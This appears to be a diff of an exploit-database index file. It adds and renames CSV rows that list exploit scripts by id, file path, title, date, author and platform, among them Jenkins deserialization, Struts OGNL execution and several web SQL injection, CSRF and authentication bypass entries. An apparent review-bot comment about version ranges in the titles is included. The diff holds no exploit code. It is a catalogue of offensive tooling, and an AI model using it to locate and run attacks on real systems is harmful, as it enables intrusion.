+44642,exploits/linux/remote/44642.rb,"Jenkins CLI - HTTP Java Deserialization (Metasploit)",2018-05-17,Metasploit,remote,linux,8080
+44643,exploits/multiple/remote/44643.rb,"Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)",2018-05-17,Metasploit,remote,multiple,8080
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
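Review bot: The new 44638 row describes the target as `Nanopool Claymore Dual Miner 7.3`, but the exploit file added in this same commit says `Version: 7.3 and later` and titles itself `>= 7.3`, so the index understates the affected range; the Inteno row renamed in this very hunk was changed precisely to carry its range (`2.0 < 4.2.0`), so `"Nanopool Claymore Dual Miner >= 7.3 - Remote Code Execution"` would be consistent with it. The 44642 Jenkins row likewise carries no version although the module's only target is `Jenkins 2.31`, while the neighbouring 44611 Mantis row does carry one.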
@@ -39321,3 +39325,7 @@ id,file,description,date,author,type,platform,port
 44631,exploits/asp/webapps/44631.html,"totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery",2018-05-16,"Compass Security",webapps,asp,
 44632,exploits/php/webapps/44632.html,"WordPress Plugin Metronet Tag Manager 1.2.7 - Cross-Site Request Forgery",2018-05-16,dxw,webapps,php,80
 44634,exploits/java/webapps/44634.txt,"RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting",2018-05-16,"SEC Consult",webapps,java,
+44636,exploits/php/webapps/44636.txt,"NodAPS 4.0 - SQL injection / Cross-Site Request Forgery",2018-05-17,L0RD,webapps,php,
+44637,exploits/hardware/webapps/44637.py,"Intelbras NCLOUD 300 1.0 - Authentication bypass",2018-05-17,"Pedro Aguiar",webapps,hardware,
+44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php,
+44640,exploits/linux/webapps/44640.txt,"Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery",2018-05-17,t4rkd3vilz,webapps,linux,